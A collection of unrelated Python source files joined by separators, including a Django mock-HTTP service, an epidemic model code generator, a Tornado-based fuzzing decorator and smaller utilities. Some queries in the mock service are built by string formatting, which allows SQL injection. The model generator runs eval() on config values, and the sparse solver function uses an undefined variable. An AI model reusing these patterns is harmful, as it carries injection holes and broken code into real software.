"repo": "https://github.com/tensorflow/models.git",
"branch": "v2.9.2",
},
source_dir=".",
entry_point="official/vision/train.py",
model_dir=False,
role="SageMakerRole",
framework_version=tensorflow_training_latest_version,
instance_count=1,
instance_type=gpu_instance_type,
hyperparameters={
"experiment": "resnet_imagenet",
"config_file": "official/vision/configs/experiments/image_classification/imagenet_resnet50_gpu.yaml",
"mode": "train",
"model_dir": "/opt/ml/model",
"params_override": overrides,
},
sagemaker_session=sagemaker_session,
disable_profiler=True,
compiler_config=TFTrainingCompilerConfig(),
)
tf.fit(
inputs=imagenet_val_set,
logs=True,
wait=True,
)
|
import apps.common.func.InitDjango
from all_models.models import *
from all_models.models.A0011_version_manage import TbVersionHttpInterface
from django.db import connection
from django.forms.models import model_to_dict
from apps.common.func.CommonFunc import *
from all_models_for_mock.models import *
from apps.common.model.Config import Config
from apps.common.func.send_mail import send_mail
class MockHttpService(object):
@staticmethod
def getInterface():
return TbHttpInterface.objects.all()
@staticmethod
def getInterfaceList(execCheckSql,list):
cursor = connection.cursor()
cursor.execute(execCheckSql,list)
return cursor.fetchall()
# @staticmethod
# def user_contacts():
# audit = 2
# sql = """SElECT * from tb_http_interface i LEFT JOIN tb_user u ON i.addBy = u.loginName WHERE 1=1 and i.state=1 and (i.addBy LIKE %s or u.userName LIKE %s) LIMIT 0,%s """ % ("%s","%s",commonWebConfig.interFacePageNum)
# cursor = connection.cursor()
# cursor.execute(sql, ["l11111111111iyc","liyc"])
# rowData = cursor.fetchall()
#
# col_names = [desc[0] for desc in cursor.description]
# result = []
# for row in rowData:
# objDict = {}
# # 把每一行的数据遍历出来放到Dict中
# for index, value in enumerate(row):
# # print(index, col_names[index], value)
# objDict[col_names[index]] = value
#
# result.append(objDict)
#
# return rowData
@staticmethod
def getInterfaceForId(id):
return Tb4MockHttp.objects.filter(id=id)[0]
@staticmethod
def getInterfaceByMockId(mockId):
try:
return Tb4MockHttp.objects.filter(mockId=mockId)[0]
except:
return False
@staticmethod
def getVersionInterfaceForId(id):
return TbVersionHttpInterface.objects.filter(id=id)[0]
@staticmethod
def getInterfaceForIdToDict(id):
return dbModelToDict(Tb4MockHttp.objects.filter(id=id)[0])
@staticmethod
def getVersionInterfaceForIdToDict(id,versionName):
return dbModelToDict(TbVersionHttpInterface.objects.filter(id=id,versionName_id=versionName)[0])
@staticmethod
def delInterfaceForId(request,id):
interfaceObj = Tb4MockHttp.objects.filter(id=id)
return interfaceObj.update(state=0)
@staticmethod
def delVersionInterfaceForId(request,id):
interfaceObj = TbVersionHttpInterface.objects.filter(id=id)
if request.session.get("loginName") != interfaceObj[0].addBy.loginName:
changeLog = TbUserChangeLog()
changeLog.version = request.session.get("version")
changeLog.loginName = request.session.get("loginName")
changeLog.otherLoginName = interfaceObj[0].addBy.loginName
changeLog.type = 0
changeLog.beforeChangeData = dictToJson(dbModelToDict(interfaceObj[0]))
changeLog.dataId = interfaceObj[0].interfaceId
changeLog.changeDataId = interfaceObj[0].interfaceId
changeLog.save()
return interfaceObj.update(state=0)
@staticmethod
def addHttpMockInfo(data,addBy):
newDataDict = {}
for k, v in data.items():
newDataDict[k] = data[k]
newDataDict["addBy"] = addBy
newDataDict["mockId"] = MockHttpService.getMockId()
saveInterface = Tb4MockHttp.objects.create(**newDataDict)
return saveInterface
@staticmethod
def addVersionInterface(data,addBy,versionName):
newDataDict = {}
for k, v in data.items():
newDataDict[k] = data[k]
newDataDict["addBy_id"] = addBy
newDataDict["interfaceId"] = MockHttpService.getVersionInterfaceId(versionName)
newDataDict["versionName_id"] = versionName
newDataDict["addTime"] = datetime.datetime.now()
newDataDict["modTime"] = datetime.datetime.now()
saveInterface = TbVersionHttpInterface.objects.create(**newDataDict)
return saveInterface
@staticmethod
def queryPeopleInterface(now_pageNum,pageNum , loginName):
limit = ('%d,%d' % (now_pageNum * pageNum,pageNum))
execSql = 'SELECT u.loginName , u.userName, c.count from tb_user u LEFT JOIN (SELECT addBy as loginName,COUNT(*) as count FROM tb_http_interface where state=1 GROUP BY addBy ) c on u.loginName = c.loginName WHERE u.state = 1 and c.count>0 and u.loginName != "%s" order by c.count desc LIMIT %s ;' % (loginName,limit)
resultDict = executeSqlGetDict(execSql,[])
return resultDict
@staticmethod
def getMockId():
try:
interfaceMaxId = Tb4MockHttp.objects.latest('id').mockId
except Exception as e:
interfaceId = 'MOCK_HTTP_1'
return interfaceId
splitData = interfaceMaxId.split('_')
interfaceId = "MOCK_HTTP_%s" % str(int(splitData[-1])+1)
return interfaceId
@staticmethod
def getVersionInterfaceId(versionName):
try:
interfaceMaxId = TbVersionHttpInterface.objects.filter(versionName_id=versionName).latest('id').interfaceId
except Exception as e:
interfaceId = 'HTTP_INTERFACE_1'
return interfaceId
splitData = interfaceMaxId.split('_')
interfaceId = "%s_%s_%s" % (splitData[0],splitData[1],(int(splitData[2])+1))
return interfaceId
@staticmethod
def getInterfaceForInterfaceId(interfaceId):
return TbHttpInterface.objects.filter(interfaceId=interfaceId)[0]
@staticmethod
def getVersionInterfaceForInterfaceId(interfaceId,versionName):
return TbVersionHttpInterface.objects.filter(interfaceId=interfaceId,versionName_id=versionName)[0]
@staticmethod
def interfaceSaveEdit(request,interfaceData):
interfaceObj = Tb4MockHttp.objects.filter(mockId=interfaceData["mockId"])
if interfaceObj:
if interfaceObj[0].addBy == "" or interfaceObj[0].addBy == None:
interfaceData['addBy'] = interfaceData['modBy']
whether_change = False
for tmpk in interfaceData:
dstValue = interfaceData[tmpk]
srcValue = getattr(interfaceObj[0], tmpk)
if str(dstValue) != str(srcValue):
whether_change = True
if whether_change:
interfaceData["modTime"] = datetime.datetime.now()
interfaceData["modBy"] = request.session.get("loginName")
interfaceObj.update(**interfaceData)
# 发邮件给相关人员
follower_email = ""
sql = "select user.email from tb4_mock_follower follower LEFT JOIN tb_user user on follower.follower=user.loginName where follower.mockId='%s'" % interfaceData["mockId"]
res= executeSqlGetDict(sql)
for tmpemail in res:
follower_email += "%s;" % tmpemail["email"]
follower_email = follower_email.strip(";")
if follower_email != "":
subject = "【%s】【%s】已更新,请关注!" % (interfaceData["mockId"], interfaceData["reqUrl"])
emailhtml = render(None, "mock_server/email.html", interfaceData).content.decode("utf8")
send_mail(follower_email, subject, emailhtml, sub_type="html")
return "更新成功"
else:
return "没有变更"
@staticmethod
def interfaceVersionSaveEdit(interfaceData):
interfaceSaveEditResule = TbVersionHttpInterface.objects.filter(id=interfaceData["id"]).update(**interfaceData)
return interfaceSaveEditResule
@staticmethod
def taskCheckInterfaceList(interfaceIdList):
interfaceList = TbHttpInterface.objects.filter(interfaceId__in=interfaceIdList)
return interfaceList
@staticmethod
def getUri(httpConfKey, uriKey,protocol = "HTTP"):
confObj = TbEnvUriConf.objects.filter(httpConfKey = httpConfKey,state = 1,uriKey = uriKey)
if confObj:
reqHost = confObj[0].requestAddr
return reqHost
else:
return ""
@staticmethod
def follow(mockid, operate, follower):
if operate == "follow":
followinfo = Tb4MockFollower.objects.filter(mockId=mockid,follower=follower).all()
if followinfo:
followinfo = followinfo[0]
else:
followinfo = Tb4MockFollower(mockId=mockid, follower=follower)
followinfo.state = 1
followinfo.save()
return 10000, "关注成功!"
elif operate == "cancel":
followinfo = Tb4MockFollower.objects.filter(mockId=mockid,follower=follower).all()
if followinfo:
followinfo = followinfo[0]
else:
return False, "施主,未曾关注,何必取消?"
followinfo.state = 0
followinfo.save(force_update=True)
return 10000, "取消关注成功!"
else:
return 10012, "错误的操作!"
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 02:23:14 2015
@author: Dimi
"""
import numpy as np
from solve_l1 import solve_l1
def formulate_sparse(A,b):
"""
A must be a M x N array
b must be a M x 1 array
Output:
y must be a N x 1
"""
m ,n = A.shape
if y.shape[0] != n:
print " The shape of y must be %d x 1" %n
elif y.shape[1] !=1:
print " The shape of y must be %d x 1" %n
elif b.shape[1] != 1:
print " The shape of b must be %d x 1" %m
elif b.shape[0] != m:
print " The shape of b must be %d x 1" %m
else: # solve
U ,S, V = np.linalg.svd(A) #V is already V.T
invA = np.linalg.pinv(A)
r = sum(S < 10**(-8) ) # rank of A
c = np.concatenate( [ np.zeros(r) , np.ones(m-r) ])
result = solve_l1(invA , np.dot(V.T,c)) #because the V returned from svd is V.T
return result
|
# -*- coding: utf-8 -*-
'''
.. created on 08.09.2016
.. by Christoph Schmitt
'''
from __future__ import print_function, absolute_import, division, unicode_literals
from reflexif.compat import *
from reflexif.models.tiff import TiffHeader
from reflexif.framework.model_base import FrameObject, child, value, Structs
from reflexif.framework.declarative import extend
class ExifHeader(FrameObject):
exif_start = value(0, 6, desc='Exif marker')
tiff_header = child(TiffHeader, 6, desc='TIFF header')
class JPEGExifSegment(FrameObject):
exif_segment_raw = child()
exif_segment = child(ExifHeader)
@property
def tiff_header(self):
return self.exif_segment.tiff_header
@extend(TiffHeader)
class ExifExtension(FrameObject):
exif_ifd = child()
gps_ifd = child()
interop_ifd = child()
def search_tag(self, ifdname, tag):
ifd = None
if ifdname == "Image":
if self.ifds:
ifd = self.ifds[0]
elif ifdname == "Exif":
ifd = self.exif_ifd
if not ifd:
return
return ifd.search_tag(tag)
@extend(TiffHeader, depends_on=[ExifExtension])
class MakernoteExentsion(FrameObject):
makernote = child()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 1 13:08:57 2020
"""
from dataclasses import dataclass
import collections
import dacite
import textwrap
import re
from .generic import codeconfig_getvars, prettifyvarname
from . import buildingblocks_dir, indentStr
import warnings
import typing
class EFractions (collections.OrderedDict):
"""
Handles the Exit fractions.
See :class:`victoria.AuxMatrix`
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.foundlist = False
print ("Define: self.foundlist = "+str())
for k in self.keys():
frac = eval(str(self[k]))
if isinstance(frac,float):
assert frac<=1
assert frac>=0
elif isinstance(frac,typing.List):
self.foundlist = True
assert [x<=1 for x in frac] == [True] * len(frac), str(frac) + "<=1 not True"
assert [x>=0 for x in frac] == [True] * len(frac), str(frac) + ">=0 not True"
else:
# Expecting a list, not leaving much options arbitrary code for now.
assert isinstance(frac, typing.List), k + ": " + str(frac) + "not valid"
if self.foundlist:
lens = [len(self[k]) for k in self.keys()]
assert lens == [lens[1]] * len(lens), "Exit fractions have different lengths: \n" + str({key:len(value) for (key,value) in self.items()})
self.ngrp = lens[0]
# TODO: post init asserts
def __repr__(self):
# FIX: unused?
res="{----------------------------"
for k in self.keys():
res+=" '"+str(k)+"':"+str(self[k])+","
res=res[:-1]+" }"
return(res)
def inlineargs(self):
""" Inline argument definition.
Outputs a string like this "f=5.0/100.0, g=0.03, h=0.4, i=0.5, "
to be used for function definition
"""
proportions_def=""
for k in self.keys():
proportions_def+=k+"="+str(self[k])+", "
#proportions_def=proportions_def[:-2]
return proportions_def
def inlineargsequals(self):
""" Inline argument definition.'
Outputs a string like this "f=f, g=g, h=h, i=i, "
to be used for Model_$className function calling
if groups are present the output is like
if ngroup
f=self.f[grp], g=self.g[grp], h=self.h[grp], i=self.i[grp]
"""
if self.foundlist:
proportions_def=""
for k in self.keys():
proportions_def+=k+"=self."+k+"[grp], "
#proportions_def=proportions_def[:-2]
return proportions_def
# in case exit probabilities are plain fractions
proportions_def=""
for k in self.keys():
proportions_def+=k+"="+k+", "
#proportions_def=proportions_def[:-2]
return proportions_def
def exitprobsDefinitions(self, baseIndent):
""" Write exit probabilities definitions for Init_fm_matrix method.
Outputs a string like::
f, g = exit_probs
self.f = f
self.g = g
"""
res = ", ".join(self.keys()) + " = exit_probs\n"
for k in self.keys():
res += "self."+k+" = "+k+"\n"
res = textwrap.indent(res, baseIndent)
res = res.replace(baseIndent,"", 1)
return res
def ModelCall_exit_probs (self):
res="["
for k in self.keys():
res+=str(self[k])+", "
res=res[:-2]+"]"
return(res)
@dataclass
class ModelMatrix:
className: str
""" See :any:`victoriaepi.configparsing.config.ModelConfig.className`"""
complexity: str
""" See :any:`victoriaepi.configparsing.config.ModelConfig.complexity`"""
prnDefault: str
""" prn -- to print or not the matrix after each operation, change default behavior."""
names: str
""" Names used in :any:`victoriaepi.victoria.AuxMatrix` """
BaseVar: str
"""Define Base Variable. see :meth:`victoriaepi.victoria.AuxMatrix.BaseVar` """
Exits: collections.OrderedDict
"""Dictionary defining connections between variables. The key represents the source variable and the value is a dict.
Example::
Exits:{
#AuxMatrix.Exit( 'S', 'E')
"S" : {"E":{}}
#AuxMatrix.SplitExit( 'E', 'I^A', 'I^S', 1-f, prob_symb=['1-f','f'])
"E" : {
"I^A":{
"prob":1-f
"prob_symb":'1-f'
}
"I^S":{
"prob":f
"prob_symb":'f'}
}
#AuxMatrix.NoExit('R')
"R" : {}
#AuxMatrix.NoExit('D')
"D" : {}
}
see also :any:`victoriaepi.victoria.AuxMatrix`
"""
ExitFractions: collections.OrderedDict = None
"""Defines the exit fractions.
Example::
ExitFractions:{
#Each can be an expression or a List of expressions
# fraction of severe infections
f:[0.05, 0.05, 0.05, 0.05]
# fraction of severe infections that require hospitalization
g:[0.004 , 0.0348 , 0.12333333, 0.2396 ]
# fraction of hospitations that require ICU
h:[0.05 , 0.0552 , 0.17266667, 0.5112 ]
# fraction of ICU patients who die
i:[0.5, 0.5, 0.5, 0.5]
}
see also :any:`victoriaepi.victoria.AuxMatrix`
This is later cast as :class:`victoriaepi.configparsing.modelclass.EFractions`
"""
def __post_init__(self):
self.splitnames = self.names.split()
# consistency checks
assert self.BaseVar in self.splitnames, "BaseVar not in names"
for k in set([kk for k in self.Exits for kk in [k]+list(self.Exits[k])]):
assert k in self.splitnames, k + " used in connections but not in names"
self.connections = self.create_connections()
# Additional configuration based on complexity
if self.ExitFractions is not None:
if len(self.ExitFractions.keys()) == 0:
self.ExitFractions = None
if self.ExitFractions is not None:
self.ExitFractions = EFractions(self.ExitFractions)
self.inlineProbArgs = self.ExitFractions.inlineargs()
def processcon(self, origin, dest):
"""
Process individual connections.
Creates connection code such as ``T.Exit( 'I^B', 'R')``
"""
if(len(dest.keys())) == 0:
return('T.NoExit("'+origin+'")\n')
if(len(dest.keys())) == 1:
return('T.Exit( "'+origin+'" , "'+list(dest.keys())[0]+'" )\n')
if(len(dest.keys())) == 2:
v1 = list(dest.keys())[0]
v2 = list(dest.keys())[1]
# TODO: assert probabilities?
# assert dest[v1]["prob"]+dest[v2]["prob"]==1, "Proportion "+origin+"->"+v1+"+"+v2+"="+dest[v1]["prob"]+dest[v2]["prob"]+"!=1"
prob = dest[v1]["prob"]
prob_symb=[dest[v1]["prob_symb"], dest[v2]["prob_symb"]]
return('T.SplitExit( "'+origin+'" , "'+v1+'" , "'+v2+'" , '+prob
+' , '+str(prob_symb)+' )\n')
raise RuntimeError('Unable to handle more than two exit connections')
def create_connections(self):
""" Create connection code for all connections.
Example output::
T.BaseVar('S')
T.Exit( 'S', 'E')
T.SplitExit( 'E', 'I^A', 'I^S', 1-f, prob_symb=['1-f','f'])
T.Exit( 'I^A', 'R')
"""
code='T.BaseVar("'+self.BaseVar+'")\n'
for origin in self.Exits:
code+=self.processcon(origin, self.Exits[origin])
code=textwrap.indent(code, indentStr)
return code
def gencode(self, indent=""):
"""Generate code for a function such as :meth:`victoriaepi.ama.Model_ama` or :meth:`victoriaepi.seid.Model_SEID` depending on complexity."""
with open(buildingblocks_dir+self.complexity+"_ModelMatrix.py","r") as f:
fullcode= f.read()
variables=codeconfig_getvars(fullcode)
if len(variables)>0:
variables.sort(key=lambda x: len(x), reverse=True)
for va in variables:
if eval("self."+va[1:]) is None:
warnings.warn("Inserting None for "+va, UserWarning)
fullcode=fullcode.replace(va, str(eval("self."+va[1:])))
compile(fullcode, "<ModelMatrix Code>\n"+fullcode, 'exec')
firstline=fullcode.splitlines()[0]
return textwrap.indent(fullcode,
indent,
lambda x: not firstline in x)
def genMaskcode(self, indent=""):
"""Generate code for the masks to select variables from list of state variables, for all variables.
Example::
self.mask_S = self.T.SelectMask('S')
self.mask_E = self.T.SelectMask('E')
self.mask_IA = self.T.SelectMask('I^A')
self.mask_ISs = self.T.SelectMask('I^S', E_range='all', as_col_vec=True)
self.mask_IBs = self.T.SelectMask('I^B', E_range='all', as_col_vec=True)
self.mask_ISs_flat = self.T.SelectMask('I^S', E_range='all')
"""
code=''
for var in self.splitnames:
code+="self.mask_"+prettifyvarname(var)+" = self.T.SelectMask('"+var+"')\n"
code+="self.mask_"+prettifyvarname(var)+"s_flat = self.T.SelectMask('"+var+"', E_range='all')\n"
#Adding 's and _flat for splits
if len(self.Exits[var].keys())==2:
code+="self.mask_"+prettifyvarname(var)+"s = self.T.SelectMask('"+var+"', E_range='all', as_col_vec=True)\n"
compile(code, "<ModelMatrix Mask Code>", 'exec')
firstline=code.splitlines()[0]
return textwrap.indent(code,
indent,
lambda x: not firstline in x)
def genSelfExitProbscode(self, indent=""):
return("")#TODO: genSelfExitProbscode
def __repr__(self):
"""Return this object as raw code representation for a function such as :meth:`victoriaepi.ama.Model_ama` or :meth:`victoriaepi.seid.Model_SEID` depending on complexity."""
return self.gencode()
class rawfuncbody():
"""
Process a raw string as a function body and tests it for valid Python code with ``compile()``.
"""
def __init__(self, strfun, indent=indentStr):
self.strfun=strfun
self.indent=indent
strfun0=re.sub(r"(\s*)(return( |$|\n))", r"\1Return0=0#\3", strfun)
#strfun0=strfun.replace("return ","Return0 = ")
#strfun0=strfun.replace("return\n","#return\n")
compile(strfun0, "<\n"+strfun0+"\n>", 'exec')
def __repr__(self):
return textwrap.indent(self.strfun,
self.indent)
@dataclass
class functiondef ():
"""Defining functions from ordered dicts."""
defn: str
body: str
def __post_init__(self):
assert re.search( "[:;]", self.defn) is None
assert re.search( "^def ", self.defn) is None
compile(self.defn, self.defn,"exec")
self.defn ="def "+self.defn +":"
self.body = rawfuncbody(self.body, indent = indentStr)
self.baseIndent = ""
compile(self.__repr__(), "<"+self.__repr__()+">", 'exec')
def __repr__(self):
return textwrap.indent(self.defn+"\n"+str(self.body),
self.baseIndent)
@classmethod
def fromodic(cls, odic, baseIndent=""):
"""
Initialize instance from dictionary
Parameters
"""
assert re.search( r"[^\s]", baseIndent) is None
cins = dacite.from_dict(data_class = cls, data = odic)
cins.baseIndent = baseIndent
return cins
class functionCollection ():
"""Handles a dictionary consisting of several :any:`victoriaepi.configparsing.modelclass.functiondef`.
"""
def __init__(self, methodict, baseIndent):
assert re.search( r"[^\s]", baseIndent) is None
self.baseIndent = baseIndent
self.methodict = methodict.copy()
for k in self.methodict.keys():
self.methodict[k] = functiondef.fromodic(self.methodict[k], self.baseIndent)
def __repr__(self):
"""Generates Python code for the function"""
res=""
for k in self.methodict.keys():
res+=str(self.methodict[k])+"\n\n"
#remove indentation from first line as it is expected to be provided externaly
res = res.replace(self.baseIndent,"", 1)
return (res)
class solvingMethods (functionCollection):
""" Making sure basic solving functions are present. This class is an extension of
:any:`victoriaepi.configparsing.modelclass.functionCollection` that ensures that
``rhs``, ``solve``, ``llikelihood``, ``lprior``, ``support``, and ``sim_init`` are properly defined.
"""
def __init__(self, methodict, baseIndent):
super().__init__(methodict, baseIndent)
funcs = self.methodict.keys()
basicfuncs=['rhs', 'solve', 'llikelihood', 'lprior', 'support', 'sim_init']
for bf in basicfuncs:
assert bf in funcs, bf +" method expected in solvingMethods"
r = re.compile("solve_plain.*")
assert len(list(filter(r.match, self.methodict.keys() )))>0,"At least one 'solve_plain' method expected in solvingMethods"
class plottingMethods (functionCollection):
"""Making sure basic plotting functions are present. This class is an extension of
:any:`victoriaepi.configparsing.modelclass.functionCollection` that ensures that at least one ``PlotEvolution.*`` method is present."""
def __init__(self, methodict, baseIndent):
super().__init__(methodict, baseIndent)
r = re.compile("PlotEvolution.*")
assert len(list(filter(r.match, self.methodict.keys() )))>0,"At least one 'PlotEvolution' method is expected in solvingMethods"
|
# -*- coding: utf-8 -*-
"""Common exception types for database operations"""
from __future__ import absolute_import, division, unicode_literals
class SQLiteConnectionError(Exception):
"""An error occurred in the database connection"""
class SQLiteError(Exception):
"""An error occurred in the database operations"""
class MySQLConnectionError(Exception):
"""An error occurred in the database connection"""
class MySQLError(Exception):
"""An error occurred in the database operations"""
class ProfilesMissing(Exception):
"""There are no stored profiles in database"""
|
code = ""
file = ""
pos = 0
line = 0
oldLine = 0
oldPos = 0
oldCode = ""
oldFile = ""
def next_file(name, src):
global code, file, pos, line, oldLine, oldPos, oldCode, oldFile
if (oldFile != ""):
return "imports aren't allowed in imported files!"
oldCode = code
oldFile = file
oldLine = line
oldPos = pos
code = src
file = name
pos = 0
line = 0
return ""
def prev_file():
global code, file, pos, line, oldLine, oldPos, oldCode, oldFile
code = oldCode
file = oldFile
pos = oldPos
line = oldLine
oldCode = ""
oldFile = ""
oldPos = 0
oldLine = 0
next_instr = ""
def next_instruction():
global code, pos, next_instr, line
if pos >= len(code)-1:
return True
char = code[pos]
if pos != 0:
# Get to next line if not at top
while char != "\n":
char = code[pos]
pos += 1
if char == "\n":
line += 1
if pos >= len(code)-1:
return True
# Get to next char
char = code[pos]
if char == "\n":
line += 1
while char == " " or char == "\t" or char == "\n":
pos += 1
if pos >= len(code)-1:
return True
char = code[pos]
if char == "\n":
line += 1
# Get to end of instruction
next_instr = ""
char = code[pos]
while char != " " and char != "\n":
next_instr += char
pos += 1
if pos >= len(code)-1:
next_instr += code[pos]
break
char = code[pos]
if char == "\n":
line += 1
return False
def get_next_param():
global code, pos, line
# Get first char of param
char = code[pos]
while char == " ":
pos += 1
char = code[pos]
# Get param
openQuote = False
running = True
param = ""
while running:
# Check if at end
if is_paramend(openQuote):
running = False
# if not at end
if running:
char = code[pos]
canAdd = True
isEscape = False
# If escape char then ignore other stuff
if char == "\\":
param += char
pos += 1
char = code[pos]
param += char
isEscape = True
if not isEscape:
# Quote Check
if char == "\"":
openQuote = not openQuote
canAdd = False
# Check if at end
if (char == " " or char == "\n") and (not openQuote):
running = False
canAdd = False
if char == "\n":
line += 1
# Add char to param
if canAdd:
param += char
pos += 1
return param
def is_paramend(openquote):
return pos >= len(code) or code[pos] == "\n" or (not openquote and code[pos] == "#")
|
"""
Tyson Reimer
University of Manitoba
October 13th, 2019
"""
import os
import numpy as np
from umbmid import get_proj_path, verify_path, get_script_logger, null_logger
from umbmid.loadsave import save_pickle, save_mat
from umbmid.build import import_fd_cal_dataset
from umbmid.sigproc import iczt
###############################################################################
__OUTPUT_DIR = os.path.join(get_proj_path(),
'datasets/')
verify_path(__OUTPUT_DIR)
###############################################################################
def make_clean_files(gen='one', cal_type='emp', sparams='s11',
logger=null_logger):
"""Makes and saves the clean .mat and .pickle files
Parameters
----------
gen : str
The generation of data to be used, must be in ['one', 'two']
cal_type : str
The type of calibration to be performed, must be in
['emp', 'adi'
sparams : str
The type of sparam to save, must be in ['s11', 's21']
logger :
A logger for logging progress
"""
assert gen in ['one', 'two', 'three'], \
"Error: gen must be in ['one', 'two', 'three']"
assert sparams in ['s11', 's21'], \
"Error: sparams must be in ['s11', 's21']"
# Load the frequency-domain dataset
logger.info('\tImporting FD data and metadata...')
fd_data, fd_md = import_fd_cal_dataset(cal_type=cal_type,
prune=True,
gen=gen,
sparams=sparams,
logger=logger)
logger.info('\tImport complete. Saving to .pickle and .mat files...')
# Define an output dir for this generation of dataset
this_output_dir = os.path.join(__OUTPUT_DIR,
'gen-%s/clean/' % gen)
verify_path(this_output_dir) # Verify that this dir exists
logger.info('Num data samples:\t\t%s' % np.size(fd_data, axis=0))
logger.info('Length of metadata:\t\t%s' % len(fd_md))
# Save the frequency-domain data and metadata
save_pickle(fd_md,
os.path.join(this_output_dir, 'md_list_%s_%s.pickle' %
(sparams, cal_type)))
save_pickle(fd_data,
os.path.join(this_output_dir, 'fd_data_%s_%s.pickle' %
(sparams, cal_type)))
save_mat(fd_data, 'fd_data_%s' % sparams,
os.path.join(this_output_dir, 'fd_data_%s_%s.mat'
% (sparams, cal_type)))
save_mat(fd_md, 'md_%s' % sparams,
os.path.join(this_output_dir, 'md_list_%s_%s.mat'
% (sparams, cal_type)))
logger.info('\tComplete saving clean data files.')
###############################################################################
if __name__ == '__main__':
our_logger = get_script_logger(__file__)
for cal_type in ['emp', 'adi']:
# for cal_type in ['adi']:
for gen in ['three']: # For each generation of dataset
if gen in ['two', 'three']: # If the second generation
# S11 and S21 are possible sparams
possible_sparams = ['s11', 's21']
else: # If the first generation
# S11 is only possible sparams
possible_sparams = ['s11']
for sparams in possible_sparams: # For each possible sparam
make_clean_files(gen=gen,
sparams=sparams,
cal_type=cal_type,
logger=our_logger)
|
# Copyright (c) 2016-2021 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import asyncio
import logging
import socket
import threading
from inspect import isclass, isroutine
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
logger = logging.getLogger(__name__)
class TornadoDecorator(object):
"""
Decorator for fuzzers to transport generated content through http. It is
useful for transporting fuzz tests to browser SUTs.
The decorator starts a Tornado server at the start of the fuzz job and
returns an http url as test input. If the SUT accesses the domain root
through a GET request, then the decorated fuzzer is invoked and the
response is the generated test. Accessing other paths can return static
or dynamically rendered content.
**Optional parameters of the fuzzer decorator:**
- ``template_path``: Directory containing .html template files. These are
served from the path / without the .html extension.
- ``static_path``: Directory from which static files will be served.
These are served from the path /static/.
- ``url``: Url template with {port} and {index} placeholders, that will
be filled in with appropriate values. This is the url that will be
served for the SUT as the test case.
(Default: http://localhost:{port}/index={index})
- ``refresh``: Integer number denoting the time interval (in seconds)
for the document at the root path (i.e., the test case) to refresh
itself. Setting it to 0 means no refresh. (Default: 0)
**Example configuration snippet:**
.. code-block:: ini
[sut.foo]
# assuming that foo expects a http url as input, which it tries to access
# afterwards
[fuzz.foo-with-bar-over-http]
sut=foo
#fuzzer=...
fuzzer.decorate(0)=fuzzinator.fuzzer.TornadoDecorator
batch=5
[fuzz.foo-with-bar-over-http.fuzzer.decorate(0)]
template_path=/home/lili/fuzzer/templates/
static_path=/home/lili/fuzzer/static/
# assuming that there is a main.html in the template_path directory
url=http://localhost:{port}/main?index={index}
refresh=3
"""
def __init__(self, template_path=None, static_path=None, url=None, refresh=None, **kwargs):
self.template_path = template_path
self.static_path = static_path
self.url = url or 'http://localhost:{port}?index={index}'
self.refresh = int(refresh) if refresh else 0
self.port = None
# Disable all the output of the tornado server to avoid messing up with Fuzzinator's messages.
hn = logging.NullHandler()
hn.setLevel(logging.DEBUG)
logging.getLogger('tornado.access').addHandler(hn)
logging.getLogger('tornado.access').propagate = False
def __call__(self, callable):
ancestor = object if isroutine(callable) else callable
decorator = self
class Inherited(ancestor):
def __init__(self, *args, **kwargs):
if hasattr(ancestor, '__init__'):
super().__init__(*args, **kwargs)
self.index = 0
self.test = None
self.fuzzer_kwargs = dict()
self.t = None
def __call__(self, **kwargs):
# Saving fuzzer args to make them available from the RequestHandlers
# after passing a reference of ourselves.
if kwargs['index'] != 0 and self.test is None:
return None
self.fuzzer_kwargs = kwargs
return decorator.url.format(port=decorator.port, index=self.index)
def __enter__(self, *args, **kwargs):
if hasattr(ancestor, '__enter__'):
super().__enter__(*args, **kwargs)
# Get random available port.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: # pylint: disable=no-member
s.bind(('', 0))
decorator.port = s.getsockname()[1]
handlers = [(r'/', self.MainHandler, dict(wrapper=self, fuzzer=super().__call__ if isclass(callable) else callable))]
if decorator.template_path:
handlers += [(r'/(.+)', self.TemplateHandler, {})]
app = Application(handlers,
template_path=decorator.template_path,
static_path=decorator.static_path,
debug=True)
def ioloop_thread():
asyncio.set_event_loop(asyncio.new_event_loop())
app.listen(decorator.port)
IOLoop.current().start()
logger.debug('Tornado server started.')
self.t = threading.Thread(target=ioloop_thread)
self.t.start()
return self
def __exit__(self, *exc):
suppress = False
if hasattr(ancestor, '__exit__'):
suppress = super().__exit__(*exc)
self.t._stop()
logger.debug('Shut down tornado server.')
return suppress
class MainHandler(RequestHandler):
def __init__(self, application, request, wrapper, fuzzer):
super().__init__(application, request)
self.wrapper = wrapper
self.fuzzer = fuzzer
def data_received(self, chunk):
pass
def get(self):
try:
self.wrapper.fuzzer_kwargs['index'] = self.wrapper.index
self.wrapper.test = self.fuzzer(**self.wrapper.fuzzer_kwargs)
if self.wrapper.test is not None:
self.wrapper.index += 1
if decorator.refresh > 0:
self.set_header('Refresh', '{timeout}; url={url}'
.format(timeout=decorator.refresh,
url=decorator.url.format(port=decorator.port,
index=self.wrapper.index)))
test = self.wrapper.test
if not isinstance(test, (str, bytes, dict)):
test = str(test)
self.write(test)
except Exception as e:
logger.warning('Unhandled exception in TornadoDecorator.', exc_info=e)
class TemplateHandler(RequestHandler):
def get(self, page):
try:
self.render(page + '.html')
except FileNotFoundError:
logger.debug('%s not found', page)
self.send_error(404)
return Inherited
|
#!/usr/bin/env python3
import socket, threading, json, traceback, configparser, os, ssl, time, select, asyncio, websockets, importlib
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
DOMAIN = 'localhost'
PORT = 5566
PORT_SSL = 5567
USE_SSL = False
CERT = ''
KEY = ''
ADDONS_LIST = ''
if os.path.exists('server.cfg'):
config = configparser.RawConfigParser()
config.read('server.cfg')
DOMAIN = config.get('DEFAULT','domain',fallback='localhost')
PORT = config.getint('DEFAULT','port',fallback=5566)
PORT_SSL = config.getint('DEFAULT','port_ssl',fallback=5567)
USE_SSL = config.getboolean('DEFAULT','use_ssl',fallback=False)
CERT = config.get('DEFAULT','cert',fallback='')
KEY = config.get('DEFAULT','key',fallback='')
ADDONS_LIST = config.get('DEFAULT','addons',fallback='')
addons = []
